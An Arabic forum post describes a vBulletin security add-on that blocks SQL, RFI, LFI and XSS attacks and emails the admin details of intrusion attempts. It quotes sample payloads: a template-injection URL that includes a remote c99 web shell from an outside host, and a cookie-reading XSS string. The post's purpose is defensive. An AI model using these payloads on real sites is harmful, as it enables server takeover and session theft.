السلام عليكم اخي
لحماية المنتدى ومنع تطبيق انواع الثغرات وبشكل محدد تطبيق اكواد الثغرات من انواع SQL , RFI , LFI , Xss واكواد التحويل ومنع تلغيم المنتدى باكواد ثغرات في ملفات ال faq.php وال calendar.php وال showgroups.php
والمميز في الهاك انه به خاصية التبليغ على البريد مباشرة في حال حدث اي محاولة اختراق راح تصلك رساله وفيها ايبي الي حاول يخترق و استثمار الثغرة والتاريخ والوقت , لكي تحول دون وقوعها وهذا مثال من البريد بعد تجربة الهاك لمدة 3 شهور والحمد الله دو اي خلل بحمد الله .
ب . منع تطبيق ثغرات ال Remote File Include ( ثغرات الاحتواء والتضمين )
http://hackteach.org/cc/misc.php?do=page&template= {${include('ht tp://casavie.net/hack/c99.txt')}}{${exit()}
كود:
http://hackteach.org/cc/faq.php?faq=<script>alert( document.cookie);</script>
منع اي كود تحويل كان وفي حال تواجد الاحصائيات والاهدائات واخر عشر مواضيع , تم حل مشكلتهم قطعيا قطعيا ,
الان نجي لخطوة تعديل ال البريد :
اول ما تحمل الهاك وتفك الضغط عنه , قوم بفتحه بالمفكرة او الدفتر او اي محرر php ,
قم بالبحث عن admin@h4ps.com , واستبدله بالبريد الي بتريد يوصلك عليه تبليغ محاولة الاختراق ,
طريقة منع ثغرات php
النمط المتتابع
